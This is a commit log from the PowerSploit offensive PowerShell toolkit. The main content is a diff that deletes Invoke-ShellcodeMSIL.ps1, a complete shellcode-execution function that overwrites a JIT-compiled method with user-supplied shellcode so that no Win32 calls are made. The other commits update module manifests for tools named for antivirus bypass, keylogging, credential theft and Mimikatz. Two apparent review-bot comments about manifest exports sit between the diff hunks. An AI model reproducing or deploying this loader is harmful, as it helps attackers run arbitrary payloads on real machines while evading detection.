From d0fff7b6371ccb52952268f47ae68e85c3aeeb91 Mon Sep 17 00:00:00 2001 From: Matt Graeber Date: Wed, 4 Nov 2015 14:56:46 -0500 Subject: Migrating everything back to Invoke-Shellcode.ps1. I'm done making my point now. :P --- CodeExecution/CodeExecution.psd1 | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) (limited to 'CodeExecution/CodeExecution.psd1') diff --git a/CodeExecution/CodeExecution.psd1 b/CodeExecution/CodeExecution.psd1 index 8dc5b75..0d0799b 100644 --- a/CodeExecution/CodeExecution.psd1 +++ b/CodeExecution/CodeExecution.psd1 @@ -73,7 +73,7 @@ AliasesToExport = '' ModuleList = @(@{ModuleName = 'CodeExecution'; ModuleVersion = '1.0.0.0'; GUID = 'a8a6780b-e694-4aa4-b28d-646afa66733c'}) # List of all files packaged with this module -FileList = 'CodeExecution.psm1', 'CodeExecution.psd1', 'Invoke--Shellcode.ps1', 'Invoke-DllInjection.ps1', +FileList = 'CodeExecution.psm1', 'CodeExecution.psd1', 'Invoke-Shellcode.ps1', 'Invoke-DllInjection.ps1', 'Invoke-ShellcodeMSIL.ps1', 'Invoke-ReflectivePEInjection.ps1', 'Invoke-WmiCommand.ps1', 'Usage.md' # Private data to pass to the module specified in RootModule/ModuleToProcess -- cgit v1.2.3 From 18b7a10f89eb5f1038c443b5b39d3a8e327fb090 Mon Sep 17 00:00:00 2001 From: Matt Graeber Date: Thu, 5 Nov 2015 13:26:05 -0500 Subject: Removing Invoke-ShellcodeMSIL This was only ever intended to be a PoC. I'll bring this back if requested but it exhibits duplicate functionality. --- CodeExecution/CodeExecution.psd1 | 2 +- CodeExecution/Invoke-ShellcodeMSIL.ps1 | 267 --------------------------------- README.md | 4 - 3 files changed, 1 insertion(+), 272 deletions(-) delete mode 100644 CodeExecution/Invoke-ShellcodeMSIL.ps1 (limited to 'CodeExecution/CodeExecution.psd1') diff --git a/CodeExecution/CodeExecution.psd1 b/CodeExecution/CodeExecution.psd1 index 0d0799b..96e9abc 100644 --- a/CodeExecution/CodeExecution.psd1 +++ b/CodeExecution/CodeExecution.psd1 
@@ -74,7 +74,7 @@ ModuleList = @(@{ModuleName = 'CodeExecution'; ModuleVersion = '1.0.0.0'; GUID = # List of all files packaged with this module FileList = 'CodeExecution.psm1', 'CodeExecution.psd1', 'Invoke-Shellcode.ps1', 'Invoke-DllInjection.ps1', - 'Invoke-ShellcodeMSIL.ps1', 'Invoke-ReflectivePEInjection.ps1', 'Invoke-WmiCommand.ps1', 'Usage.md' + 'Invoke-ReflectivePEInjection.ps1', 'Invoke-WmiCommand.ps1', 'Usage.md' # Private data to pass to the module specified in RootModule/ModuleToProcess # PrivateData = '' diff --git a/CodeExecution/Invoke-ShellcodeMSIL.ps1 b/CodeExecution/Invoke-ShellcodeMSIL.ps1 deleted file mode 100644 index 158a643..0000000 --- a/CodeExecution/Invoke-ShellcodeMSIL.ps1 +++ /dev/null 
@@ -1,267 +0,0 @@ -function Invoke-ShellcodeMSIL -{ -<# -.SYNOPSIS - - Execute shellcode within the context of the running PowerShell process without making any Win32 function calls. - - PowerSploit Function: Invoke-ShellcodeMSIL - Author: Matthew Graeber (@mattifestation) - License: BSD 3-Clause - Required Dependencies: None - Optional Dependencies: None - -.DESCRIPTION - - Invoke-ShellcodeMSIL executes shellcode by using specially crafted MSIL opcodes to overwrite a JITed dummy method. This technique is compelling because unlike Invoke-Shellcode, Invoke-ShellcodeMSIL doesn't call any Win32 functions. - -.PARAMETER Shellcode - - Specifies the shellcode to be executed. - -.EXAMPLE - - C:\PS> Invoke-Shellcode -Shellcode @(0x90,0x90,0xC3) - - Description - ----------- - Executes the following instructions - 0x90 (NOP), 0x90 (NOP), 0xC3 (RET) - Warning: This script has no way to validate that your shellcode is 32 vs. 64-bit! - -.NOTES - - Your shellcode must end in a ret (0xC3) and maintain proper stack alignment or PowerShell will crash! - - Use the '-Verbose' option to print detailed information. - -.LINK - - http://www.exploit-monday.com -#> - - [CmdletBinding()] Param ( - [Parameter( Mandatory = $True )] - [ValidateNotNullOrEmpty()] - [Byte[]] - $Shellcode - ) - - function Get-MethodAddress - { - [CmdletBinding()] Param ( - [Parameter(Mandatory = $True, ValueFromPipeline = $True)] - [System.Reflection.MethodInfo] - $MethodInfo - ) - - if ($MethodInfo.MethodImplementationFlags -eq 'InternalCall') - { - Write-Warning "$($MethodInfo.Name) is an InternalCall method. These methods always point to the same address." 
- } - - try { $Type = [MethodLeaker] } catch [Management.Automation.RuntimeException] # Only build the assembly if it hasn't already been defined - { - if ([IntPtr]::Size -eq 4) { $ReturnType = [UInt32] } else { $ReturnType = [UInt64] } - - $Domain = [AppDomain]::CurrentDomain - $DynAssembly = New-Object System.Reflection.AssemblyName('MethodLeakAssembly') - # Assemble in memory - $AssemblyBuilder = $Domain.DefineDynamicAssembly($DynAssembly, [System.Reflection.Emit.AssemblyBuilderAccess]::Run) - $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('MethodLeakModule') - $TypeBuilder = $ModuleBuilder.DefineType('MethodLeaker', [System.Reflection.TypeAttributes]::Public) - # Declaration of the LeakMethod method - $MethodBuilder = $TypeBuilder.DefineMethod('LeakMethod', [System.Reflection.MethodAttributes]::Public -bOr [System.Reflection.MethodAttributes]::Static, $ReturnType, $null) - $Generator = $MethodBuilder.GetILGenerator() - - # Push unmanaged pointer to MethodInfo onto the evaluation stack - $Generator.Emit([System.Reflection.Emit.OpCodes]::Ldftn, $MethodInfo) - $Generator.Emit([System.Reflection.Emit.OpCodes]::Ret) - - # Assemble everything - $Type = $TypeBuilder.CreateType() - } - - $Method = $Type.GetMethod('LeakMethod') - - try - { - # Call the method and return its JITed address - $Address = $Method.Invoke($null, @()) - - Write-Output (New-Object IntPtr -ArgumentList $Address) - } - catch [System.Management.Automation.MethodInvocationException] - { - Write-Error "$($MethodInfo.Name) cannot return an unmanaged address." 
- } - } - -#region Define the method that will perform the overwrite - try { $SmasherType = [MethodSmasher] } catch [Management.Automation.RuntimeException] # Only build the assembly if it hasn't already been defined - { - $Domain = [AppDomain]::CurrentDomain - $DynAssembly = New-Object System.Reflection.AssemblyName('MethodSmasher') - $AssemblyBuilder = $Domain.DefineDynamicAssembly($DynAssembly, [System.Reflection.Emit.AssemblyBuilderAccess]::Run) - $Att = New-Object System.Security.AllowPartiallyTrustedCallersAttribute - $Constructor = $Att.GetType().GetConstructors()[0] - $ObjectArray = New-Object System.Object[](0) - $AttribBuilder = New-Object System.Reflection.Emit.CustomAttributeBuilder($Constructor, $ObjectArray) - $AssemblyBuilder.SetCustomAttribute($AttribBuilder) - $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('MethodSmasher') - $ModAtt = New-Object System.Security.UnverifiableCodeAttribute - $Constructor = $ModAtt.GetType().GetConstructors()[0] - $ObjectArray = New-Object System.Object[](0) - $ModAttribBuilder = New-Object System.Reflection.Emit.CustomAttributeBuilder($Constructor, $ObjectArray) - $ModuleBuilder.SetCustomAttribute($ModAttribBuilder) - $TypeBuilder = $ModuleBuilder.DefineType('MethodSmasher', [System.Reflection.TypeAttributes]::Public) - $Params = New-Object System.Type[](3) - $Params[0] = [IntPtr] - $Params[1] = [IntPtr] - $Params[2] = [Int32] - $MethodBuilder = $TypeBuilder.DefineMethod('OverwriteMethod', [System.Reflection.MethodAttributes]::Public -bOr [System.Reflection.MethodAttributes]::Static, $null, $Params) - $Generator = $MethodBuilder.GetILGenerator() - # The following MSIL opcodes are effectively a memcpy - # arg0 = destinationAddr, arg1 = sourceAddr, arg2 = length - $Generator.Emit([System.Reflection.Emit.OpCodes]::Ldarg_0) - $Generator.Emit([System.Reflection.Emit.OpCodes]::Ldarg_1) - $Generator.Emit([System.Reflection.Emit.OpCodes]::Ldarg_2) - $Generator.Emit([System.Reflection.Emit.OpCodes]::Volatile) - 
$Generator.Emit([System.Reflection.Emit.OpCodes]::Cpblk) - $Generator.Emit([System.Reflection.Emit.OpCodes]::Ret) - - $SmasherType = $TypeBuilder.CreateType() - } - - $OverwriteMethod = $SmasherType.GetMethod('OverwriteMethod') -#endregion - -#region Define the method that we're going to overwrite - try { $Type = [SmashMe] } catch [Management.Automation.RuntimeException] # Only build the assembly if it hasn't already been defined - { - $Domain = [AppDomain]::CurrentDomain - $DynAssembly = New-Object System.Reflection.AssemblyName('SmashMe') - $AssemblyBuilder = $Domain.DefineDynamicAssembly($DynAssembly, [System.Reflection.Emit.AssemblyBuilderAccess]::Run) - $Att = New-Object System.Security.AllowPartiallyTrustedCallersAttribute - $Constructor = $Att.GetType().GetConstructors()[0] - $ObjectArray = New-Object System.Object[](0) - $AttribBuilder = New-Object System.Reflection.Emit.CustomAttributeBuilder($Constructor, $ObjectArray) - $AssemblyBuilder.SetCustomAttribute($AttribBuilder) - $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('SmashMe') - $ModAtt = New-Object System.Security.UnverifiableCodeAttribute - $Constructor = $ModAtt.GetType().GetConstructors()[0] - $ObjectArray = New-Object System.Object[](0) - $ModAttribBuilder = New-Object System.Reflection.Emit.CustomAttributeBuilder($Constructor, $ObjectArray) - $ModuleBuilder.SetCustomAttribute($ModAttribBuilder) - $TypeBuilder = $ModuleBuilder.DefineType('SmashMe', [System.Reflection.TypeAttributes]::Public) - $Params = New-Object System.Type[](1) - $Params[0] = [Int] - $MethodBuilder = $TypeBuilder.DefineMethod('OverwriteMe', [System.Reflection.MethodAttributes]::Public -bOr [System.Reflection.MethodAttributes]::Static, [Int], $Params) - $Generator = $MethodBuilder.GetILGenerator() - $XorValue = 0x41424344 - $Generator.DeclareLocal([Int]) | Out-Null - $Generator.Emit([System.Reflection.Emit.OpCodes]::Ldarg_0) - # The following MSIL opcodes serve two purposes: - # 1) Serves as a dummy XOR function to take 
up space in memory when it gets jitted - # 2) A series of XOR instructions won't be optimized out. This way, I'll be guaranteed to sufficient space for my shellcode. - foreach ($CodeBlock in 1..100) - { - $Generator.Emit([System.Reflection.Emit.OpCodes]::Ldc_I4, $XorValue) - $Generator.Emit([System.Reflection.Emit.OpCodes]::Xor) - $Generator.Emit([System.Reflection.Emit.OpCodes]::Stloc_0) - $Generator.Emit([System.Reflection.Emit.OpCodes]::Ldloc_0) - $XorValue++ - } - $Generator.Emit([System.Reflection.Emit.OpCodes]::Ldc_I4, $XorValue) - $Generator.Emit([System.Reflection.Emit.OpCodes]::Xor) - $Generator.Emit([System.Reflection.Emit.OpCodes]::Ret) - $Type = $TypeBuilder.CreateType() - } - - $TargetMethod = $Type.GetMethod('OverwriteMe') -#endregion - - # Force the target method to be JITed so that is can be cleanly overwritten - Write-Verbose 'Forcing target method to be JITed...' - - foreach ($Exec in 1..20) - { - $TargetMethod.Invoke($null, @(0x11112222)) | Out-Null - } - - if ( [IntPtr]::Size -eq 4 ) - { - # x86 Shellcode stub - $FinalShellcode = [Byte[]] @(0x60,0xE8,0x04,0,0,0,0x61,0x31,0xC0,0xC3) - <# - 00000000 60 pushad - 00000001 E804000000 call dword 0xa - 00000006 61 popad - 00000007 31C0 xor eax,eax - 00000009 C3 ret - YOUR SHELLCODE WILL BE PLACED HERE... - #> - - Write-Verbose 'Preparing x86 shellcode...' - } - else - { - # x86_64 shellcode stub - $FinalShellcode = [Byte[]] @(0x41,0x54,0x41,0x55,0x41,0x56,0x41,0x57, - 0x55,0xE8,0x0D,0x00,0x00,0x00,0x5D,0x41, - 0x5F,0x41,0x5E,0x41,0x5D,0x41,0x5C,0x48, - 0x31,0xC0,0xC3) - <# - 00000000 4154 push r12 - 00000002 4155 push r13 - 00000004 4156 push r14 - 00000006 4157 push r15 - 00000008 55 push rbp - 00000009 E80D000000 call dword 0x1b - 0000000E 5D pop rbp - 0000000F 415F pop r15 - 00000011 415E pop r14 - 00000013 415D pop r13 - 00000015 415C pop r12 - 00000017 4831C0 xor rax,rax - 0000001A C3 ret - YOUR SHELLCODE WILL BE PLACED HERE... - #> - - Write-Verbose 'Preparing x86_64 shellcode...' 
- } - - # Append user-provided shellcode. - $FinalShellcode += $Shellcode - - # Allocate pinned memory for our shellcode - $ShellcodeAddress = [Runtime.InteropServices.Marshal]::AllocHGlobal($FinalShellcode.Length) - - Write-Verbose "Allocated shellcode at 0x$($ShellcodeAddress.ToString("X$([IntPtr]::Size*2)"))." - - # Copy the original shellcode bytes into the pinned, unmanaged memory. - # Note: this region of memory if marked PAGE_READWRITE - [Runtime.InteropServices.Marshal]::Copy($FinalShellcode, 0, $ShellcodeAddress, $FinalShellcode.Length) - - $TargetMethodAddress = [IntPtr] (Get-MethodAddress $TargetMethod) - - Write-Verbose "Address of the method to be overwritten: 0x$($TargetMethodAddress.ToString("X$([IntPtr]::Size*2)"))" - Write-Verbose 'Overwriting dummy method with the shellcode...' - - $Arguments = New-Object Object[](3) - $Arguments[0] = $TargetMethodAddress - $Arguments[1] = $ShellcodeAddress - $Arguments[2] = $FinalShellcode.Length - - # Overwrite the dummy method with the shellcode opcodes - $OverwriteMethod.Invoke($null, $Arguments) - - Write-Verbose 'Executing shellcode...' - - # 'Invoke' our shellcode >D - $ShellcodeReturnValue = $TargetMethod.Invoke($null, @(0x11112222)) - - if ($ShellcodeReturnValue -eq 0) - { - Write-Verbose 'Shellcode executed successfully!' - } -} diff --git a/README.md b/README.md index 4761e00..dcbd989 100644 --- a/README.md +++ b/README.md @@ -18,10 +18,6 @@ Reflectively loads a Windows PE file (DLL/EXE) in to the powershell process, or Injects shellcode into the process ID of your choosing or within PowerShell locally. -#### `Invoke-ShellcodeMSIL` - -Execute shellcode within the context of the running PowerShell process without making any Win32 function calls. - #### `Invoke-WmiCommand` Executes a PowerShell ScriptBlock on a target computer and returns its formatted output using WMI as a C2 channel. -- cgit v1.2.3 From 9f183e36518176c4299eed5c68b7deac7f4e8025 Mon Sep 17 00:00:00 2001 
From: Matt Graeber Date: Fri, 18 Dec 2015 16:28:03 -0800 Subject: Set all module versions to 3.0 Also cleaned up some module manifest cruft. --- AntivirusBypass/AntivirusBypass.psd1 | 19 ++------- CodeExecution/CodeExecution.psd1 | 57 +-------------------------- Exfiltration/Exfiltration.psd1 | 17 +------- Mayhem/Mayhem.psd1 | 59 +--------------------------- Persistence/Persistence.psd1 | 5 +-- PowerSploit.psd1 | 17 ++++---- Privesc/Privesc.psd1 | 62 +----------------------------- Recon/Recon.psd1 | 59 +--------------------------- ScriptModification/ScriptModification.psd1 | 59 +--------------------------- 9 files changed, 19 insertions(+), 335 deletions(-) (limited to 'CodeExecution/CodeExecution.psd1') diff --git a/AntivirusBypass/AntivirusBypass.psd1 b/AntivirusBypass/AntivirusBypass.psd1 index 507cfdb..037f570 100644 --- a/AntivirusBypass/AntivirusBypass.psd1 +++ b/AntivirusBypass/AntivirusBypass.psd1 @@ -1,9 +1,10 @@ @{ + # Script module or binary module file associated with this manifest. ModuleToProcess = 'AntivirusBypass.psm1' # Version number of this module. -ModuleVersion = '1.0.0.0' +ModuleVersion = '3.0.0.0' # ID used to uniquely identify this module GUID = '7cf9de61-2bfc-41b4-a397-9d7cf3a8e66b' @@ -11,9 +12,6 @@ GUID = '7cf9de61-2bfc-41b4-a397-9d7cf3a8e66b' # Author of this module Author = 'Matthew Graeber' -# Company or vendor of this module -CompanyName = '' - # Copyright statement for this module Copyright = 'BSD 3-Clause' 
@@ -26,18 +24,7 @@ PowerShellVersion = '2.0' # Functions to export from this module FunctionsToExport = '*' -# Cmdlets to export from this module -CmdletsToExport = '*' - -# Variables to export from this module -VariablesToExport = '' - -# Aliases to export from this module -AliasesToExport = '' - -# List of all modules packaged with this module. -ModuleList = @(@{ModuleName = 'AntivirusBypass'; ModuleVersion = '1.0.0.0'; GUID = '7cf9de61-2bfc-41b4-a397-9d7cf3a8e66b'}) - # List of all files packaged with this module FileList = 'AntivirusBypass.psm1', 'AntivirusBypass.psd1', 'Find-AVSignature.ps1', 'Usage.md' + } diff --git a/CodeExecution/CodeExecution.psd1 b/CodeExecution/CodeExecution.psd1 index 96e9abc..93c2cd3 100644 --- a/CodeExecution/CodeExecution.psd1 +++ b/CodeExecution/CodeExecution.psd1 @@ -4,7 +4,7 @@ ModuleToProcess = 'CodeExecution.psm1' # Version number of this module. -ModuleVersion = '1.0.0.0' +ModuleVersion = '3.0.0.0' # ID used to uniquely identify this module GUID = 'a8a6780b-e694-4aa4-b28d-646afa66733c' 
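Review bot: Dropping `VariablesToExport = ''` and `AliasesToExport = ''` in this hunk leaves `FunctionsToExport = '*'` as the only export control in AntivirusBypass.psd1, so the manifest no longer states that variables and aliases stay private. As far as I know, an omitted export key places no restriction on what the root module exports, so the effective surface now depends on each .psm1, which this diff does not show. The same keys are removed from the CodeExecution, Exfiltration, Mayhem, Recon and ScriptModification manifests (Privesc had them set to `'*'`). I would keep both keys as `@()` and replace the wildcard with an explicit function list, as Privesc.psd1 and Recon.psd1 already do, so the exported command set can be audited from the manifest alone.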
@@ -24,65 +24,10 @@ Description = 'PowerSploit Code Execution Module' # Minimum version of the Windows PowerShell engine required by this module PowerShellVersion = '2.0' -# Name of the Windows PowerShell host required by this module -# PowerShellHostName = '' - -# Minimum version of the Windows PowerShell host required by this module -# PowerShellHostVersion = '' - -# Minimum version of the .NET Framework required by this module -# DotNetFrameworkVersion = '' - -# Minimum version of the common language runtime (CLR) required by this module -# CLRVersion = '' - -# Processor architecture (None, X86, Amd64) required by this module -# ProcessorArchitecture = '' - -# Modules that must be imported into the global environment prior to importing this module -# RequiredModules = @() - -# Assemblies that must be loaded prior to importing this module -# RequiredAssemblies = @() - -# Script files (.ps1) that are run in the caller's environment prior to importing this module. -# ScriptsToProcess = '' - -# Type files (.ps1xml) to be loaded when importing this module -# TypesToProcess = @() - -# Format files (.ps1xml) to be loaded when importing this module -# FormatsToProcess = @() - -# Modules to import as nested modules of the module specified in RootModule/ModuleToProcess -# NestedModules = @() - # Functions to export from this module FunctionsToExport = '*' -# Cmdlets to export from this module -CmdletsToExport = '*' - -# Variables to export from this module -VariablesToExport = '' - -# Aliases to export from this module -AliasesToExport = '' - -# List of all modules packaged with this module. 
-ModuleList = @(@{ModuleName = 'CodeExecution'; ModuleVersion = '1.0.0.0'; GUID = 'a8a6780b-e694-4aa4-b28d-646afa66733c'}) - # List of all files packaged with this module FileList = 'CodeExecution.psm1', 'CodeExecution.psd1', 'Invoke-Shellcode.ps1', 'Invoke-DllInjection.ps1', 'Invoke-ReflectivePEInjection.ps1', 'Invoke-WmiCommand.ps1', 'Usage.md' - -# Private data to pass to the module specified in RootModule/ModuleToProcess -# PrivateData = '' - -# HelpInfo URI of this module -# HelpInfoURI = '' - -# Default prefix for commands exported from this module. Override the default prefix using Import-Module -Prefix. -# DefaultCommandPrefix = '' - } diff --git a/Exfiltration/Exfiltration.psd1 b/Exfiltration/Exfiltration.psd1 index 6776b14..da78493 100644 --- a/Exfiltration/Exfiltration.psd1 +++ b/Exfiltration/Exfiltration.psd1 @@ -4,7 +4,7 @@ ModuleToProcess = 'Exfiltration.psm1' # Version number of this module. -ModuleVersion = '1.0.0.0' +ModuleVersion = '3.0.0.0' # ID used to uniquely identify this module GUID = '75dafa99-1402-4e29-b5d4-6c87da2b323a' @@ -12,9 +12,6 @@ GUID = '75dafa99-1402-4e29-b5d4-6c87da2b323a' # Author of this module Author = 'Matthew Graeber' -# Company or vendor of this module -CompanyName = '' - # Copyright statement for this module Copyright = 'BSD 3-Clause' 
@@ -30,18 +27,6 @@ FormatsToProcess = 'Get-VaultCredential.ps1xml' # Functions to export from this module FunctionsToExport = '*' -# Cmdlets to export from this module -CmdletsToExport = '*' - -# Variables to export from this module -VariablesToExport = '' - -# Aliases to export from this module -AliasesToExport = '' - -# List of all modules packaged with this module. -ModuleList = @(@{ModuleName = 'Exfiltration'; ModuleVersion = '1.0.0.0'; GUID = '75dafa99-1402-4e29-b5d4-6c87da2b323a'}) - # List of all files packaged with this module FileList = 'Exfiltration.psm1', 'Exfiltration.psd1', 'Get-TimedScreenshot.ps1', 'Out-Minidump.ps1', 'Get-Keystrokes.ps1', 'Get-GPPPassword.ps1', 'Usage.md', 'Invoke-Mimikatz.ps1', diff --git a/Mayhem/Mayhem.psd1 b/Mayhem/Mayhem.psd1 index 8eb0566..f28493f 100644 --- a/Mayhem/Mayhem.psd1 +++ b/Mayhem/Mayhem.psd1 @@ -4,7 +4,7 @@ ModuleToProcess = 'Mayhem.psm1' # Version number of this module. -ModuleVersion = '1.0.0.0' +ModuleVersion = '3.0.0.0' # ID used to uniquely identify this module GUID = 'e65b93ff-63ba-4c38-97f1-bc4fe5a6651c' @@ -12,9 +12,6 @@ GUID = 'e65b93ff-63ba-4c38-97f1-bc4fe5a6651c' # Author of this module Author = 'Matthew Graeber' -# Company or vendor of this module -CompanyName = '' - # Copyright statement for this module Copyright = 'BSD 3-Clause' 
@@ -24,64 +21,10 @@ Description = 'PowerSploit Mayhem Module' # Minimum version of the Windows PowerShell engine required by this module PowerShellVersion = '2.0' -# Name of the Windows PowerShell host required by this module -# PowerShellHostName = '' - -# Minimum version of the Windows PowerShell host required by this module -# PowerShellHostVersion = '' - -# Minimum version of the .NET Framework required by this module -# DotNetFrameworkVersion = '' - -# Minimum version of the common language runtime (CLR) required by this module -# CLRVersion = '' - -# Processor architecture (None, X86, Amd64) required by this module -# ProcessorArchitecture = '' - -# Modules that must be imported into the global environment prior to importing this module -# RequiredModules = @() - -# Assemblies that must be loaded prior to importing this module -# RequiredAssemblies = @() - -# Script files (.ps1) that are run in the caller's environment prior to importing this module. -# ScriptsToProcess = '' - -# Type files (.ps1xml) to be loaded when importing this module -# TypesToProcess = @() - -# Format files (.ps1xml) to be loaded when importing this module -# FormatsToProcess = @() - -# Modules to import as nested modules of the module specified in RootModule/ModuleToProcess -# NestedModules = @() - # Functions to export from this module FunctionsToExport = '*' -# Cmdlets to export from this module -CmdletsToExport = '*' - -# Variables to export from this module -VariablesToExport = '' - -# Aliases to export from this module -AliasesToExport = '' - -# List of all modules packaged with this module. 
-ModuleList = @(@{ModuleName = 'Mayhem'; ModuleVersion = '1.0.0.0'; GUID = 'e65b93ff-63ba-4c38-97f1-bc4fe5a6651c'}) - # List of all files packaged with this module FileList = 'Mayhem.psm1', 'Mayhem.psd1', 'Usage.md' -# Private data to pass to the module specified in RootModule/ModuleToProcess -# PrivateData = '' - -# HelpInfo URI of this module -# HelpInfoURI = '' - -# Default prefix for commands exported from this module. Override the default prefix using Import-Module -Prefix. -# DefaultCommandPrefix = '' - } diff --git a/Persistence/Persistence.psd1 b/Persistence/Persistence.psd1 index e17faf1..ffcd875 100644 --- a/Persistence/Persistence.psd1 +++ b/Persistence/Persistence.psd1 @@ -4,7 +4,7 @@ ModuleToProcess = 'Persistence.psm1' # Version number of this module. -ModuleVersion = '1.1.1.0' +ModuleVersion = '3.0.0.0' # ID used to uniquely identify this module GUID = '633d0f10-a056-41da-869d-6d2f75430195' @@ -24,9 +24,6 @@ PowerShellVersion = '2.0' # Functions to export from this module FunctionsToExport = '*' -# Cmdlets to export from this module -CmdletsToExport = '*' - # List of all files packaged with this module FileList = 'Persistence.psm1', 'Persistence.psd1', 'Usage.md' diff --git a/PowerSploit.psd1 b/PowerSploit.psd1 index 10c59f2..bc482e1 100644 --- a/PowerSploit.psd1 +++ b/PowerSploit.psd1 @@ -3,7 +3,7 @@ ModuleToProcess = 'PowerSploit.psm1' # Version number of this module. -ModuleVersion = '1.0.0.0' +ModuleVersion = '3.0.0.0' # ID used to uniquely identify this module GUID = '6753b496-d842-40a3-924a-0f09e248640c' 
@@ -138,13 +138,13 @@ FunctionsToExport = @( ) # List of all modules packaged with this module. -ModuleList = @( @{ModuleName = 'AntivirusBypass'; ModuleVersion = '1.0.0.0'; GUID = '7cf9de61-2bfc-41b4-a397-9d7cf3a8e66b'}, - @{ModuleName = 'CodeExecution'; ModuleVersion = '1.0.0.0'; GUID = 'a8a6780b-e694-4aa4-b28d-646afa66733c'}, - @{ModuleName = 'Exfiltration'; ModuleVersion = '1.0.0.0'; GUID = '75dafa99-1402-4e29-b5d4-6c87da2b323a'}, - @{ModuleName = 'Recon'; ModuleVersion = '1.0.0.0'; GUID = '7e775ad6-cd3d-4a93-b788-da067274c877'}, - @{ModuleName = 'ScriptModification'; ModuleVersion = '1.0.0.0'; GUID = 'a4d86266-b39b-437a-b5bb-d6f99aa6e610'}, - @{ModuleName = 'Persistence'; ModuleVersion = '1.0.0.0'; GUID = '633d0f10-a056-41da-869d-6d2f75430195'}, - @{ModuleName = 'PrivEsc'; ModuleVersion = '1.0.0.0'; GUID = 'efb2a78f-a069-4bfd-91c2-7c7c0c225f56'} ) +ModuleList = @( @{ModuleName = 'AntivirusBypass'; ModuleVersion = '3.0.0.0'; GUID = '7cf9de61-2bfc-41b4-a397-9d7cf3a8e66b'}, + @{ModuleName = 'CodeExecution'; ModuleVersion = '3.0.0.0'; GUID = 'a8a6780b-e694-4aa4-b28d-646afa66733c'}, + @{ModuleName = 'Exfiltration'; ModuleVersion = '3.0.0.0'; GUID = '75dafa99-1402-4e29-b5d4-6c87da2b323a'}, + @{ModuleName = 'Recon'; ModuleVersion = '3.0.0.0'; GUID = '7e775ad6-cd3d-4a93-b788-da067274c877'}, + @{ModuleName = 'ScriptModification'; ModuleVersion = '3.0.0.0'; GUID = 'a4d86266-b39b-437a-b5bb-d6f99aa6e610'}, + @{ModuleName = 'Persistence'; ModuleVersion = '3.0.0.0'; GUID = '633d0f10-a056-41da-869d-6d2f75430195'}, + @{ModuleName = 'PrivEsc'; ModuleVersion = '3.0.0.0'; GUID = 'efb2a78f-a069-4bfd-91c2-7c7c0c225f56'} ) PrivateData = @{ @@ -162,4 +162,5 @@ PrivateData = @{ } } + } diff --git a/Privesc/Privesc.psd1 b/Privesc/Privesc.psd1 index bca4261..34ebf7b 100644 --- a/Privesc/Privesc.psd1 +++ b/Privesc/Privesc.psd1 
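Review bot: The rewritten `ModuleList` in PowerSploit.psd1 still has no entry for Mayhem, although Mayhem/Mayhem.psd1 is bumped to 3.0.0.0 in this same commit, and it names `'PrivEsc'` where the module directory and manifest are spelled `Privesc`. Because this commit removes the per-module `ModuleList` keys, this list is the only remaining inventory of packaged submodules and should match what actually ships. If Mayhem is left out on purpose, a comment saying so would help; otherwise add `@{ModuleName = 'Mayhem'; ModuleVersion = '3.0.0.0'; GUID = 'e65b93ff-63ba-4c38-97f1-bc4fe5a6651c'}`. `FileList` and the body of `FunctionsToExport` in this manifest are outside the hunk, so I cannot tell whether Mayhem is omitted there as well.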
@@ -4,7 +4,7 @@ ModuleToProcess = 'Privesc.psm1' # Version number of this module. -ModuleVersion = '1.0.0.0' +ModuleVersion = '3.0.0.0' # ID used to uniquely identify this module GUID = 'efb2a78f-a069-4bfd-91c2-7c7c0c225f56' @@ -12,9 +12,6 @@ GUID = 'efb2a78f-a069-4bfd-91c2-7c7c0c225f56' # Author of this module Author = 'Will Schroder' -# Company or vendor of this module -CompanyName = '' - # Copyright statement for this module Copyright = 'BSD 3-Clause' @@ -24,39 +21,6 @@ Description = 'PowerSploit Privesc Module' # Minimum version of the Windows PowerShell engine required by this module PowerShellVersion = '2.0' -# Name of the Windows PowerShell host required by this module -# PowerShellHostName = '' - -# Minimum version of the Windows PowerShell host required by this module -# PowerShellHostVersion = '' - -# Minimum version of Microsoft .NET Framework required by this module -# DotNetFrameworkVersion = '' - -# Minimum version of the common language runtime (CLR) required by this module -# CLRVersion = '' - -# Processor architecture (None, X86, Amd64) required by this module -# ProcessorArchitecture = '' - -# Modules that must be imported into the global environment prior to importing this module -# RequiredModules = @() - -# Assemblies that must be loaded prior to importing this module -# RequiredAssemblies = @() - -# Script files (.ps1) that are run in the caller's environment prior to importing this module. -# ScriptsToProcess = @() - -# Type files (.ps1xml) to be loaded when importing this module -# TypesToProcess = @() - -# Format files (.ps1xml) to be loaded when importing this module -# FormatsToProcess = @() - -# Modules to import as nested modules of the module specified in RootModule/ModuleToProcess -# NestedModules = @() - # Functions to export from this module FunctionsToExport = @( 'Get-ServiceUnquoted', 
@@ -81,32 +45,8 @@ FunctionsToExport = @( 'Invoke-AllChecks' ) -# Cmdlets to export from this module -CmdletsToExport = '*' - -# Variables to export from this module -VariablesToExport = '*' - -# Aliases to export from this module -AliasesToExport = '*' - -# DSC resources to export from this module -# DscResourcesToExport = @() - -# List of all modules packaged with this module -ModuleList = @(@{ModuleName = 'Privesc'; ModuleVersion = '1.0.0.0'; GUID = 'efb2a78f-a069-4bfd-91c2-7c7c0c225f56'}) - # List of all files packaged with this module FileList = 'Privesc.psm1', 'PowerUp.ps1', 'README.md' -# Private data to pass to the module specified in RootModule/ModuleToProcess -# PrivateData = '' - -# HelpInfo URI of this module -# HelpInfoURI = '' - -# Default prefix for commands exported from this module. Override the default prefix using Import-Module -Prefix. -# DefaultCommandPrefix = '' - } diff --git a/Recon/Recon.psd1 b/Recon/Recon.psd1 index 5a4cfbe..55f19f7 100644 --- a/Recon/Recon.psd1 +++ b/Recon/Recon.psd1 @@ -4,7 +4,7 @@ ModuleToProcess = 'Recon.psm1' # Version number of this module. -ModuleVersion = '1.0.0.0' +ModuleVersion = '3.0.0.0' # ID used to uniquely identify this module GUID = '7e775ad6-cd3d-4a93-b788-da067274c877' @@ -12,9 +12,6 @@ GUID = '7e775ad6-cd3d-4a93-b788-da067274c877' # Author of this module Author = 'Matthew Graeber', 'Will Schroeder' -# Company or vendor of this module -CompanyName = '' - # Copyright statement for this module Copyright = 'BSD 3-Clause' 
